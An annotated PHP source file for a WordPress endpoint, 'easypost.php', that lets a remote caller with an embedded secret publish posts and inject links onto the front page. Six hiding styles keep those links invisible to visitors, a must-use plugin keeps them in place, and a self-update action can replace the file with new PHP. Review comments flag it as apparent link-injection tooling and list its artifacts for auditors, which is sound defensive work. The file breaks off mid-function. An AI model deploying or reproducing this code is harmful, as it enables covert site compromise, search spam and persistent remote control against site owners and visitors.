Editing: easypost.php
<?php
/**
 * easypost.php: standalone HTTP endpoint that loads WordPress and performs
 * content changes on behalf of a remote caller.
 *
 * Request flow (see the dispatch code at the bottom of the file):
 *   1. Only POST is accepted.
 *   2. wp-load.php is located and loaded BEFORE the request is authenticated.
 *   3. The request must carry five x-easypost-* headers and an HMAC-SHA256
 *      signature keyed with a secret stored in this file.
 *   4. $_GET['action'] selects: health, create_post, place_homepage_link,
 *      remove_homepage_link, rotate_token (answers 501), update_endpoint.
 *
 * What an authenticated caller can do, as visible in this file:
 *   - create posts that are always published (create_post);
 *   - store link HTML in an option and have a must-use plugin print it on the
 *     front page, optionally styled so visitors cannot see it
 *     (place_homepage_link);
 *   - replace this file with new PHP delivered in the request body, subject to
 *     an RSA signature check (update_endpoint).
 *
 * Artifacts this file creates or reads, useful when auditing a site:
 *   - file:       <mu-plugins dir>/easypost-runtime.php
 *   - option:     easypost_homepage_placements
 *   - post meta:  _easypost_homepage_placement_<id>
 *   - transients: easypost_endpoint_req_<sha256>, easypost_homepage_<post id>
 *   - markup:     elements carrying data-placement="<id>"
 *
 * NOTE(review): hidden-link placement styles combined with a self-replacing
 * endpoint and a must-use plugin are consistent with link-injection tooling.
 * Confirm with the site owner that this was installed deliberately; if not,
 * treat the file and every artifact above as unauthorized.
 */

// Embedded configuration (JSON text). token_verifier has the form
// "v1:<field>:<secret>"; the third field is returned as-is by
// easypost_endpoint_verifier_secret() and used as the HMAC key, so the shared
// request-signing secret sits in this file in cleartext. Anyone able to read
// the file can sign requests. ota_release_public_key_pem is the key used to
// verify self-update payloads.
define('EASYPOST_ENDPOINT_CONFIG', '{"endpoint_version":"2026.06.10","token_id":"ep_d86603bb305d43288f66f318667802a8","token_verifier":"v1:c105b6b8c858ba7433d364ef2f87a7c3:b684765552a41367df35d8a3ee6adfcf001a4693a2334ca6edbe751de1ea3b8f","ota_release_public_key_pem":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JTcpyvncP1Izz2SsnLq\\nGm3iObZi5YEydCeQPv0kX5pN3WwEzt/j1fsyd3EVHbLlXUmdQbWvCBIX1wq/RO4q\\n4UuLpks++nnz7pNTyZqrU+gPUlQb4uDBJsE6nePRyddoMGbT8yF4yzLt/fp86oSG\\ncd/TqnUIplM4dmQVtzqaUiGSUFLReUO0tMHvYGTRl/jCM/pJmIMNLEFmAb/x6wT4\\nihEIXD39Uj2/BG/zJFiIc6FNvqRp1DRm50lhPJW7LkDin+LkvSebbIubeYEe3vc9\\n7qX0zD2zpTFv04itmPld0eOa7kXHNsr+jUnTmuovzdIzBJjcgSWT/nqI+bRAXfL6\\nUwIDAQAB\\n-----END PUBLIC KEY-----"}');

/**
 * Decodes the embedded configuration constant into an associative array.
 */
function easypost_endpoint_config() {
    return json_decode(EASYPOST_ENDPOINT_CONFIG, true);
}

/**
 * Sends a JSON response with the given HTTP status and terminates the script.
 *
 * This function never returns. Every error path in the file goes through it,
 * so code after a call to it is unreachable.
 */
function easypost_endpoint_json($status, $payload) {
    http_response_code($status);
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode($payload);
    exit;
}

/**
 * Returns the value of a request header, matched case-insensitively, or ''.
 *
 * Scans $_SERVER for HTTP_* keys and compares them after turning underscores
 * into hyphens, so "x-easypost-token-id" matches HTTP_X_EASYPOST_TOKEN_ID.
 */
function easypost_endpoint_header($name) {
    $key = strtolower($name);
    foreach ($_SERVER as $server_key => $value) {
        if (strpos($server_key, 'HTTP_') !== 0) {
            continue;
        }
        $normalized = strtolower(str_replace('_', '-', substr($server_key, 5)));
        if ($normalized === $key) {
            return (string) $value;
        }
    }
    return '';
}

/**
 * Looks for a readable wp-load.php in this directory and up to five parents.
 *
 * Returns the first match, or false when none is readable.
 */
function easypost_endpoint_wp_load_path() {
    $candidates = array(
        __DIR__ . '/wp-load.php',
        __DIR__ . '/../wp-load.php',
        __DIR__ . '/../../wp-load.php',
        __DIR__ . '/../../../wp-load.php',
        __DIR__ . '/../../../../wp-load.php',
        __DIR__ . '/../../../../../wp-load.php',
    );
    foreach ($candidates as $candidate) {
        if ($candidate && is_readable($candidate)) {
            return $candidate;
        }
    }
    return false;
}

/**
 * Loads WordPress via wp-load.php, or answers 500 wp_load_not_found.
 *
 * The dispatch code calls this before easypost_endpoint_verify_auth(), so an
 * unauthenticated POST still triggers a full WordPress bootstrap.
 */
function easypost_endpoint_bootstrap_wordpress() {
    $wp_load = easypost_endpoint_wp_load_path();
    if (!$wp_load) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'wp_load_not_found'));
    }
    require_once $wp_load;
}

/**
 * Extracts the HMAC key from a "v1:<field>:<secret>" verifier string.
 *
 * Returns the third colon-separated field, or false when the format does not
 * match. The second field is not read anywhere in this file.
 */
function easypost_endpoint_verifier_secret($verifier) {
    $parts = explode(':', (string) $verifier, 3);
    if (count($parts) !== 3 || $parts[0] !== 'v1' || $parts[2] === '') {
        return false;
    }
    return $parts[2];
}

/**
 * Authenticates the current request or terminates with an error response.
 *
 * Checks, in order: presence of the five x-easypost-* headers, token id,
 * timestamp within 300 seconds of server time, SHA-256 of the raw body,
 * request-id replay, and an HMAC-SHA256 signature. Each failure answers with
 * a distinct error code and exits.
 *
 * @param string $body Raw request body as read from php://input.
 */
function easypost_endpoint_verify_auth($body) {
    $config = easypost_endpoint_config();
    $token_id = easypost_endpoint_header('x-easypost-token-id');
    $timestamp = easypost_endpoint_header('x-easypost-timestamp');
    $request_id = easypost_endpoint_header('x-easypost-request-id');
    $body_sha256 = easypost_endpoint_header('x-easypost-body-sha256');
    $signature = easypost_endpoint_header('x-easypost-signature');
    if ($token_id === '' || $timestamp === '' || $request_id === '' || $body_sha256 === '' || $signature === '') {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'missing_auth_headers'));
    }
    if (!hash_equals((string) $config['token_id'], $token_id)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'unknown_token'));
    }
    // The timestamp is parsed with strtotime(), so any format it accepts passes.
    $request_time = strtotime($timestamp);
    if (!$request_time || abs(time() - $request_time) > 300) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'timestamp_stale'));
    }
    $computed_body_sha256 = hash('sha256', $body);
    if (!hash_equals($computed_body_sha256, $body_sha256)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'body_sha256_mismatch'));
    }
    // Replay guard: one transient per (token id, request id). The check is
    // skipped entirely when get_transient() is not defined.
    $replay_key = 'easypost_endpoint_req_' . hash('sha256', $token_id . ':' . $request_id);
    if (function_exists('get_transient') && get_transient($replay_key)) {
        easypost_endpoint_json(409, array('ok' => false, 'error' => 'duplicate_request_id'));
    }
    $secret = easypost_endpoint_verifier_secret($config['token_verifier']);
    if (!$secret) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'invalid_token_verifier'));
    }
    // Signed string: METHOD, REQUEST_URI, timestamp, request id, token id and
    // body hash joined by newlines. REQUEST_URI normally includes the query
    // string, so ?action= would be covered by the signature (confirm for the
    // web server in use).
    $path = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/wp-content/easypost/easypost.php';
    $signature_input = implode("\n", array(
        strtoupper($_SERVER['REQUEST_METHOD']),
        $path,
        $timestamp,
        $request_id,
        $token_id,
        $computed_body_sha256,
    ));
    $expected = hash_hmac('sha256', $signature_input, $secret);
    if (!hash_equals($expected, $signature)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'signature_mismatch'));
    }
    // The request id is recorded only after the signature verifies, for 300 s.
    if (function_exists('set_transient')) {
        set_transient($replay_key, '1', 300);
    }
}

/**
 * Decodes the JSON request body into an array, or answers 400 invalid_json.
 */
function easypost_endpoint_payload($body) {
    $payload = json_decode($body, true);
    if (!is_array($payload)) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_json'));
    }
    return $payload;
}

/**
 * Answers 200 with a capability report for the host site.
 *
 * The report includes the endpoint version, token id, site URL, PHP version,
 * whether Elementor is loaded, and the installed runtime version.
 */
function easypost_endpoint_health() {
    easypost_endpoint_bootstrap_wordpress();
    $config = easypost_endpoint_config();
    $runtime_status = easypost_endpoint_homepage_runtime_status();
    easypost_endpoint_json(200, array(
        'ok' => true,
        'endpointVersion' => $config['endpoint_version'],
        'tokenId' => $config['token_id'],
        'canBootstrapWordPress' => true,
        'canInsertPosts' => function_exists('wp_insert_post'),
        'canResolveHomepage' => function_exists('get_option') && function_exists('get_post'),
        'canPlaceHomepageLink' => function_exists('wp_update_post') && function_exists('get_post_meta') && function_exists('update_post_meta'),
        'canRemoveHomepageLink' => function_exists('wp_update_post') && function_exists('get_post_meta') && function_exists('update_post_meta'),
        'canManageHomepageRuntime' => $runtime_status['canManage'],
        'homepageRuntimeVersion' => $runtime_status['version'],
        'canUseTransients' => function_exists('set_transient') && function_exists('get_transient'),
        'canCleanCaches' => function_exists('clean_post_cache') || function_exists('wp_cache_delete'),
        'hasElementor' => did_action('elementor/loaded') || class_exists('\Elementor\Plugin'),
        'siteUrl' => function_exists('site_url') ? site_url() : null,
        'phpVersion' => PHP_VERSION,
        'serverTime' => gmdate('c'),
    ));
}

/**
 * Reports a failure with ok=false and fallback=true, then exits.
 *
 * The HTTP status is 200 even though the operation failed, so access logs
 * alone do not distinguish these failures from successes.
 */
function easypost_endpoint_fallback_error($error, $message = null, $warnings = array()) {
    $payload = array('ok' => false, 'error' => $error, 'fallback' => true);
    if ($message !== null) {
        $payload['message'] = $message;
    }
    if (!empty($warnings)) {
        $payload['warnings'] = $warnings;
    }
    easypost_endpoint_json(200, $payload);
}

/**
 * Normalizes a placement payload or answers 400 invalid_payload.
 *
 * placementId must be a positive integer; linkUrl and anchorText must be
 * non-empty after esc_url_raw() / sanitize_text_field(). The same validation
 * is applied by the removal handler, so removal also requires both fields.
 */
function easypost_endpoint_validate_homepage_payload($payload) {
    $placement_id = isset($payload['placementId']) ? (int) $payload['placementId'] : 0;
    $link_url = isset($payload['linkUrl']) ? esc_url_raw((string) $payload['linkUrl']) : '';
    $anchor_text = isset($payload['anchorText']) ? sanitize_text_field((string) $payload['anchorText']) : '';
    if ($placement_id <= 0 || $link_url === '' || $anchor_text === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_payload', 'fallback' => false));
    }
    return array(
        'placementId' => $placement_id,
        'linkUrl' => $link_url,
        'anchorText' => $anchor_text,
        'preLinkText' => array_key_exists('preLinkText', $payload) ? sanitize_text_field((string) $payload['preLinkText']) : null,
        'postLinkText' => array_key_exists('postLinkText', $payload) ? sanitize_text_field((string) $payload['postLinkText']) : null,
        'placementType' => isset($payload['placementType']) ? sanitize_key((string) $payload['placementType']) : 'VISIBLE_LINK',
    );
}

/**
 * Returns the static front page post, or reports a fallback error.
 *
 * Only sites whose front page is a 'page' post are supported; a posts-index
 * front page yields homepage_posts_index_unsupported.
 */
function easypost_endpoint_homepage_post() {
    if (!function_exists('get_option') || !function_exists('get_post')) {
        easypost_endpoint_fallback_error('capability_failed');
    }
    $show_on_front = get_option('show_on_front');
    if ($show_on_front === 'posts') {
        easypost_endpoint_fallback_error('homepage_posts_index_unsupported');
    }
    $page_id = (int) get_option('page_on_front');
    if ($show_on_front !== 'page' || $page_id <= 0) {
        easypost_endpoint_fallback_error('homepage_page_not_found');
    }
    $post = get_post($page_id);
    if (!$post || $post->post_type !== 'page') {
        easypost_endpoint_fallback_error('homepage_page_not_found');
    }
    return $post;
}

/**
 * Builds "<prefix> <a href=...>anchor</a><suffix>" for one placement.
 *
 * A null preLinkText becomes the label 'Recommended resource:'.
 * NOTE(review): $prefix is concatenated without esc_html(), unlike the anchor
 * text and suffix; it relies on sanitize_text_field() having been applied by
 * the validator.
 */
function easypost_endpoint_placement_body($input) {
    $label = $input['preLinkText'] === null ? 'Recommended resource:' : $input['preLinkText'];
    $prefix = $label === '' ? '' : $label . ' ';
    $suffix = $input['postLinkText'] === null ? '' : $input['postLinkText'];
    if ($suffix !== '' && strpos($suffix, ' ') !== 0) {
        $suffix = ' ' . $suffix;
    }
    return $prefix . '<a href="' . esc_url($input['linkUrl']) . '">' . esc_html($input['anchorText']) . '</a>' . esc_html($suffix);
}

/**
 * Wraps the placement body in a <div data-placement="<id>"> element.
 *
 * Six placement types add CSS that keeps the link in the markup while hiding
 * it from a visitor: white text, a display:none class, a 1x1 px clipped box,
 * off-screen absolute positioning, visibility:hidden and near-zero opacity.
 * Any other type produces an unstyled div. When auditing rendered pages, the
 * data-placement attribute together with these inline styles is the pattern
 * to look for.
 */
function easypost_endpoint_placement_html($input) {
    $body = easypost_endpoint_placement_body($input);
    $marker = ' data-placement="' . (int) $input['placementId'] . '"';
    switch (strtoupper((string) $input['placementType'])) {
        case 'WHITE_LINK':
            return '<div' . $marker . ' style="color:#ffffff;">' . $body . '</div>';
        case 'CLASS_HIDE':
            return '<style>.dc{display:none;}</style><div' . $marker . ' class="dc">' . $body . '</div>';
        case 'NO_WIDTH':
            return '<div' . $marker . ' style="overflow:hidden;height:1px;width:1px;float:right;">' . $body . '</div>';
        case 'INVISIBLE_ZONE':
            return '<div' . $marker . ' style="left:-11407px;top:-10560px;position:absolute;">' . $body . '</div>';
        case 'NO_VISIBILITY':
            return '<div' . $marker . ' style="visibility:hidden;">' . $body . '</div>';
        case 'NO_OPACITY':
            return '<div' . $marker . ' style="opacity:0.001;cursor:context-menu;">' . $body . '</div>';
        default:
            return '<div' . $marker . '>' . $body . '</div>';
    }
}

/**
 * Returns the attribute string used to find a placement in stored markup.
 */
function easypost_endpoint_marker($placement_id) {
    return 'data-placement="' . (int) $placement_id . '"';
}

/**
 * Name of the WordPress option that holds all managed placements.
 */
function easypost_endpoint_managed_placements_option() {
    return 'easypost_homepage_placements';
}

/**
 * Path of the runtime file inside the must-use plugins directory.
 *
 * Uses WPMU_PLUGIN_DIR when defined, else WP_CONTENT_DIR . '/mu-plugins'.
 * Returns false when WP_CONTENT_DIR is not defined.
 */
function easypost_endpoint_runtime_file_path() {
    if (!defined('WP_CONTENT_DIR')) {
        return false;
    }
    $directory = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins';
    return $directory . '/easypost-runtime.php';
}

/**
 * Returns the PHP source written to easypost-runtime.php.
 *
 * The nowdoc below is a complete plugin file. As written, it:
 *   - defines EASYPOST_HOMEPAGE_RUNTIME_VERSION from the endpoint version;
 *   - on the front page only, starts output buffering at template_redirect
 *     (priority 0) and inserts every stored placement whose marker is not
 *     already in the page before the first </body>, or appends it;
 *   - also echoes the stored placements at wp_footer (priority PHP_INT_MAX).
 * Stored 'html' values are printed without further escaping.
 *
 * The template text is runtime data and is reproduced here unchanged; only
 * single quotes in the version string are escaped before substitution.
 */
function easypost_endpoint_runtime_php() {
    $config = easypost_endpoint_config();
    $version = isset($config['endpoint_version']) ? (string) $config['endpoint_version'] : 'unknown';
    $runtime = <<<'PHP'
<?php if (!defined('ABSPATH')) { exit; } if (!defined('EASYPOST_HOMEPAGE_RUNTIME_VERSION')) { define('EASYPOST_HOMEPAGE_RUNTIME_VERSION', '__EASYPOST_RUNTIME_VERSION__'); } function easypost_runtime_placements_option() { return 'easypost_homepage_placements'; } function easypost_runtime_is_homepage() { return function_exists('is_front_page') && is_front_page(); } function easypost_runtime_get_placements() { if (!function_exists('get_option')) { return array(); } $placements = get_option(easypost_runtime_placements_option(), array()); return is_array($placements) ? $placements : array(); } function easypost_runtime_missing_html($buffer = '') { $placements = easypost_runtime_get_placements(); if (empty($placements)) { return ''; } $html = array(); foreach ($placements as $placement) { if (!is_array($placement) || empty($placement['html'])) { continue; } $placement_id = isset($placement['placementId']) ? (int) $placement['placementId'] : 0; $marker = 'data-placement="' . $placement_id . '"'; if ($placement_id > 0 && $buffer !== '' && strpos($buffer, $marker) !== false) { continue; } $html[] = (string) $placement['html']; } return implode("\n", $html); } function easypost_runtime_echo() { if (!easypost_runtime_is_homepage()) { return; } $html = easypost_runtime_missing_html(''); if ($html !== '') { echo "\n" . $html . "\n"; } } function easypost_runtime_buffer_start() { if (!easypost_runtime_is_homepage() || empty(easypost_runtime_get_placements())) { return; } ob_start('easypost_runtime_inject_buffer'); } function easypost_runtime_inject_buffer($buffer) { $html = easypost_runtime_missing_html($buffer); if ($html === '') { return $buffer; } if (stripos($buffer, '</body>') !== false) { return preg_replace('/<\/body>/i', "\n" . $html . "\n</body>", $buffer, 1); } return $buffer . "\n" . $html; } add_action('template_redirect', 'easypost_runtime_buffer_start', 0); add_action('wp_footer', 'easypost_runtime_echo', PHP_INT_MAX);
PHP;
    return str_replace('__EASYPOST_RUNTIME_VERSION__', str_replace("'", "\\'", $version), $runtime);
}

/**
 * Writes the runtime file into the must-use plugins directory if it differs.
 *
 * Creates the directory when missing. Appends a reason to $warnings and
 * returns false on failure; returns true when the file is already current or
 * was written in full.
 *
 * Must-use plugins are loaded by WordPress on every request without being
 * activated, so this file stays active independently of the regular plugin
 * list. Removing this endpoint alone does not remove it.
 */
function easypost_endpoint_install_homepage_runtime(&$warnings) {
    if (!defined('WP_CONTENT_DIR') || !function_exists('wp_mkdir_p')) {
        $warnings[] = 'runtime_capability_unavailable';
        return false;
    }
    $path = easypost_endpoint_runtime_file_path();
    if (!$path) {
        $warnings[] = 'runtime_path_unavailable';
        return false;
    }
    $directory = dirname($path);
    if (!is_dir($directory) && !wp_mkdir_p($directory)) {
        $warnings[] = 'runtime_directory_unavailable';
        return false;
    }
    $php = easypost_endpoint_runtime_php();
    $current = is_readable($path) ? file_get_contents($path) : false;
    if ($current === $php) {
        return true;
    }
    $bytes = file_put_contents($path, $php, LOCK_EX);
    if ($bytes === false || $bytes !== strlen($php)) {
        $warnings[] = 'runtime_write_failed';
        return false;
    }
    return true;
}

/**
 * Reports whether the runtime can be managed and which version is installed.
 *
 * The version is read by matching the define() line in the runtime file; it
 * is null when the file is absent, unreadable or does not match.
 */
function easypost_endpoint_homepage_runtime_status() {
    $path = easypost_endpoint_runtime_file_path();
    $version = null;
    if ($path && is_readable($path)) {
        $contents = file_get_contents($path);
        if (is_string($contents) && preg_match("/EASYPOST_HOMEPAGE_RUNTIME_VERSION', '([^']+)'/", $contents, $matches)) {
            $version = $matches[1];
        }
    }
    return array(
        'canManage' => defined('WP_CONTENT_DIR') && function_exists('wp_mkdir_p') && function_exists('get_option') && function_exists('update_option'),
        'version' => $version,
    );
}

/**
 * Loads the placements option as an array (empty array when unset or invalid).
 */
function easypost_endpoint_load_managed_placements() {
    if (!function_exists('get_option')) {
        easypost_endpoint_fallback_error('capability_failed');
    }
    $placements = get_option(easypost_endpoint_managed_placements_option(), array());
    return is_array($placements) ? $placements : array();
}

/**
 * Saves the placements option; the third update_option() argument is false.
 */
function easypost_endpoint_save_managed_placements($placements) {
    if (!function_exists('update_option')) {
        easypost_endpoint_fallback_error('capability_failed');
    }
    return update_option(easypost_endpoint_managed_placements_option(), $placements, false);
}

/**
 * Stores one placement's HTML under its id in the placements option.
 *
 * Returns changed=false / alreadyPresent=true when identical HTML is already
 * stored for that id; otherwise saves and returns changed=true.
 */
function easypost_endpoint_store_managed_placement($input, $post_id, $html) {
    $placements = easypost_endpoint_load_managed_placements();
    $key = (string) (int) $input['placementId'];
    $page_url = function_exists('get_permalink') ? get_permalink($post_id) : null;
    $next = array(
        'placementId' => (int) $input['placementId'],
        'pageId' => (int) $post_id,
        'pageUrl' => $page_url,
        'html' => $html,
        'updatedAt' => gmdate('c'),
    );
    $already_present = isset($placements[$key]) && is_array($placements[$key]) && isset($placements[$key]['html']) && $placements[$key]['html'] === $html;
    if ($already_present) {
        return array('changed' => false, 'alreadyPresent' => true, 'pageUrl' => $page_url);
    }
    $placements[$key] = $next;
    if (!easypost_endpoint_save_managed_placements($placements)) {
        easypost_endpoint_fallback_error('runtime_option_update_failed');
    }
    return array('changed' => true, 'alreadyPresent' => false, 'pageUrl' => $page_url);
}

/**
 * Deletes one placement from the option; returns false when it was not there.
 */
function easypost_endpoint_remove_managed_placement($placement_id) {
    $placements = easypost_endpoint_load_managed_placements();
    $key = (string) (int) $placement_id;
    if (!array_key_exists($key, $placements)) {
        return false;
    }
    unset($placements[$key]);
    if (!easypost_endpoint_save_managed_placements($placements)) {
        easypost_endpoint_fallback_error('runtime_option_update_failed');
    }
    return true;
}

/**
 * Clears post and Elementor caches for a post and returns warning codes.
 *
 * Exceptions from the Elementor cache clear are caught and reported as a
 * warning rather than propagated.
 */
function easypost_endpoint_cache_warnings($post_id) {
    $warnings = array();
    if (function_exists('clean_post_cache')) {
        clean_post_cache($post_id);
    } else {
        $warnings[] = 'clean_post_cache_unavailable';
    }
    if (function_exists('wp_cache_delete')) {
        wp_cache_delete($post_id, 'posts');
    }
    if (class_exists('\\Elementor\\Plugin')) {
        try {
            $elementor = \Elementor\Plugin::$instance;
            if ($elementor && isset($elementor->files_manager) && method_exists($elementor->files_manager, 'clear_cache')) {
                $elementor->files_manager->clear_cache();
            }
        } catch (Throwable $ignored) {
            $warnings[] = 'elementor_cache_cleanup_failed';
        }
    } else {
        $warnings[] = 'elementor_cache_cleanup_unavailable';
    }
    return $warnings;
}

/**
 * Transient key used as a per-post lock.
 */
function easypost_endpoint_lock_key($post_id) {
    return 'easypost_homepage_' . (int) $post_id;
}

/**
 * Takes the per-post lock for 60 seconds; returns false when already held.
 *
 * The lock is a get_transient() check followed by set_transient(), so the two
 * steps are separate calls. Returns true without locking when transients are
 * unavailable.
 */
function easypost_endpoint_acquire_lock($post_id) {
    if (!function_exists('get_transient') || !function_exists('set_transient')) {
        return true;
    }
    $key = easypost_endpoint_lock_key($post_id);
    if (get_transient($key)) {
        return false;
    }
    set_transient($key, '1', 60);
    return true;
}

/**
 * Deletes the per-post lock transient when delete_transient() exists.
 */
function easypost_endpoint_release_lock($post_id) {
    if (function_exists('delete_transient')) {
        delete_transient(easypost_endpoint_lock_key($post_id));
    }
}

/**
 * Builds an Elementor 'html' widget array carrying the placement HTML.
 *
 * The widget id is the first 7 hex characters of sha256('placement-<id>').
 * Not called by any action handler in this file.
 */
function easypost_endpoint_elementor_widget($html, $placement_id) {
    return array(
        'id' => substr(hash('sha256', 'placement-' . (int) $placement_id), 0, 7),
        'elType' => 'widget',
        'widgetType' => 'html',
        'settings' => array('html' => $html),
        'elements' => array(),
    );
}

/**
 * Appends HTML to the first string setting among 'html', 'editor', 'text'.
 *
 * Modifies $settings in place; returns true when something was appended.
 */
function easypost_endpoint_append_to_elementor_settings(&$settings, $html) {
    if (!is_array($settings)) {
        return false;
    }
    foreach (array('html', 'editor', 'text') as $key) {
        if (!isset($settings[$key]) || !is_string($settings[$key])) {
            continue;
        }
        $settings[$key] = trim($settings[$key] . "\n" . $html);
        return true;
    }
    return false;
}

/**
 * Recursively inserts a widget's HTML into an Elementor node tree.
 *
 * Tries, in order: appending to the node's own settings, recursing into
 * 'elements' (appending the widget there if no child accepts it), recursing
 * into integer-keyed children, and finally appending to $node[0]['elements'].
 * Only recursion calls this function within this file.
 */
function easypost_endpoint_insert_elementor_widget(&$node, $widget) {
    if (!is_array($node)) {
        return false;
    }
    if (isset($node['settings']) && is_array($node['settings']) && easypost_endpoint_append_to_elementor_settings($node['settings'], $widget['settings']['html'])) {
        return true;
    }
    if (isset($node['elements']) && is_array($node['elements'])) {
        foreach ($node['elements'] as $index => &$child) {
            if (easypost_endpoint_insert_elementor_widget($child, $widget)) {
                unset($child);
                return true;
            }
        }
        unset($child);
        $node['elements'][] = $widget;
        return true;
    }
    foreach ($node as $index => &$child) {
        if (!is_int($index)) {
            continue;
        }
        if (easypost_endpoint_insert_elementor_widget($child, $widget)) {
            unset($child);
            return true;
        }
    }
    unset($child);
    if (isset($node[0]) && is_array($node[0]) && isset($node[0]['elements']) && is_array($node[0]['elements'])) {
        $node[0]['elements'][] = $widget;
        return true;
    }
    return false;
}

/**
 * True when the node's own settings, JSON-encoded, contain the marker text.
 */
function easypost_endpoint_elementor_node_has_direct_marker($node, $marker) {
    if (!is_array($node)) {
        return false;
    }
    if (!isset($node['settings']) || !is_array($node['settings'])) {
        return false;
    }
    $encoded = json_encode($node['settings']);
    return is_string($encoded) && strpos($encoded, $marker) !== false;
}

/**
 * Returns the node list with every node whose settings hold the marker removed.
 *
 * Recurses into 'elements'. Sets $removed to true when at least one node was
 * dropped. The whole matching node is removed, not just the marker text.
 */
function easypost_endpoint_remove_marker_from_elementor($nodes, $marker, &$removed) {
    if (!is_array($nodes)) {
        return $nodes;
    }
    $next = array();
    foreach ($nodes as $node) {
        if (is_array($node)) {
            if (easypost_endpoint_elementor_node_has_direct_marker($node, $marker)) {
                $removed = true;
                continue;
            }
            if (isset($node['elements']) && is_array($node['elements'])) {
                $node['elements'] = easypost_endpoint_remove_marker_from_elementor($node['elements'], $marker, $removed);
            }
        }
        $next[] = $node;
    }
    return $next;
}

/**
 * Action place_homepage_link: registers a link for display on the front page.
 *
 * Installs or refreshes the must-use runtime file, stores the placement HTML
 * in the placements option, records post meta on the front page post, clears
 * caches and answers 200. The front page's post_content is not modified.
 *
 * NOTE(review): every response, including success, goes through
 * easypost_endpoint_json(), which calls exit inside the try block. PHP is not
 * expected to run the finally block on exit, in which case the lock is only
 * released by its 60-second expiry. Verify on the PHP version in use.
 */
function easypost_endpoint_place_homepage_link($payload) {
    easypost_endpoint_bootstrap_wordpress();
    $input = easypost_endpoint_validate_homepage_payload($payload);
    $post = easypost_endpoint_homepage_post();
    $post_id = (int) $post->ID;
    if (!easypost_endpoint_acquire_lock($post_id)) {
        easypost_endpoint_fallback_error('lock_busy');
    }
    $warnings = array();
    try {
        $html = easypost_endpoint_placement_html($input);
        if (!easypost_endpoint_install_homepage_runtime($warnings)) {
            easypost_endpoint_fallback_error('runtime_install_failed', null, $warnings);
        }
        $stored = easypost_endpoint_store_managed_placement($input, $post_id, $html);
        if (function_exists('update_post_meta')) {
            update_post_meta($post_id, '_easypost_homepage_placement_' . (int) $input['placementId'], array('method' => 'EASYPOST_MANAGED_RENDER', 'updatedAt' => gmdate('c')));
        }
        $warnings = array_merge($warnings, easypost_endpoint_cache_warnings($post_id));
        easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_MANAGED_RENDER', 'contentId' => $post_id, 'pageUrl' => $stored['pageUrl'], 'changed' => $stored['changed'], 'alreadyPresent' => $stored['alreadyPresent'], 'warnings' => $warnings));
    } finally {
        easypost_endpoint_release_lock($post_id);
    }
}

/**
 * Action remove_homepage_link: removes a placement from every known location.
 *
 * Removes the entry from the placements option, then also strips the marker
 * from the front page's Elementor data and from post_content when present
 * there. The post meta entry and the runtime file are left in place.
 * NOTE(review): the Elementor and post_content branches presumably clean up
 * placements made by an earlier version of this endpoint. The same remark
 * about exit inside try/finally applies here.
 */
function easypost_endpoint_remove_homepage_link($payload) {
    easypost_endpoint_bootstrap_wordpress();
    $input = easypost_endpoint_validate_homepage_payload($payload);
    $post = easypost_endpoint_homepage_post();
    $post_id = (int) $post->ID;
    if (!easypost_endpoint_acquire_lock($post_id)) {
        easypost_endpoint_fallback_error('lock_busy');
    }
    try {
        $marker = easypost_endpoint_marker($input['placementId']);
        $changed = easypost_endpoint_remove_managed_placement($input['placementId']);
        $elementor_raw = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_data', true) : '';
        $elementor_mode = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_edit_mode', true) : '';
        if ($elementor_raw !== '' && $elementor_mode === 'builder' && strpos($elementor_raw, $marker) !== false) {
            $data = json_decode($elementor_raw, true);
            if (!is_array($data)) {
                easypost_endpoint_fallback_error('elementor_data_invalid');
            }
            $removed = false;
            $data = easypost_endpoint_remove_marker_from_elementor($data, $marker, $removed);
            if (!$removed || !function_exists('update_post_meta') || update_post_meta($post_id, '_elementor_data', wp_slash(json_encode($data))) === false) {
                easypost_endpoint_fallback_error('post_update_failed');
            }
            $changed = true;
        }
        $content = (string) $post->post_content;
        if (strpos($content, $marker) !== false) {
            // Removes the first <p>/<div> carrying the marker, plus a preceding
            // .dc style block if present.
            $pattern = '/\s*(?:<style>\.dc\{display:none;\}<\/style>\s*)?<(?:p|div)[^>]*data-placement="' . preg_quote((string) $input['placementId'], '/') . '"[^>]*>.*?<\/(?:p|div)>/s';
            $next = trim(preg_replace($pattern, '', $content, 1));
            $updated = wp_update_post(array('ID' => $post_id, 'post_content' => $next), true);
            if (is_wp_error($updated)) {
                easypost_endpoint_fallback_error('post_update_failed', $updated->get_error_message());
            }
            $changed = true;
        }
        $warnings = easypost_endpoint_cache_warnings($post_id);
        easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_MANAGED_RENDER', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => $changed, 'alreadyRemoved' => !$changed, 'warnings' => $warnings));
    } finally {
        easypost_endpoint_release_lock($post_id);
    }
}

/**
 * Action create_post: inserts a post and answers 201 with its id and URL.
 *
 * post_status is always 'publish'. The title, slug and post type are
 * sanitized here; the content and the date are handed to wp_insert_post()
 * exactly as received, with no sanitization in this file.
 */
function easypost_endpoint_create_post($payload) {
    easypost_endpoint_bootstrap_wordpress();
    if (!function_exists('wp_insert_post')) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'capability_failed'));
    }
    $status = 'publish';
    $post_type = !empty($payload['post_type']) ? sanitize_key($payload['post_type']) : (!empty($payload['postType']) ? sanitize_key($payload['postType']) : 'post');
    $content = isset($payload['contentHtml']) ? $payload['contentHtml'] : (isset($payload['content']) ? $payload['content'] : '');
    $postarr = array(
        'post_title' => isset($payload['title']) ? wp_strip_all_tags($payload['title']) : '',
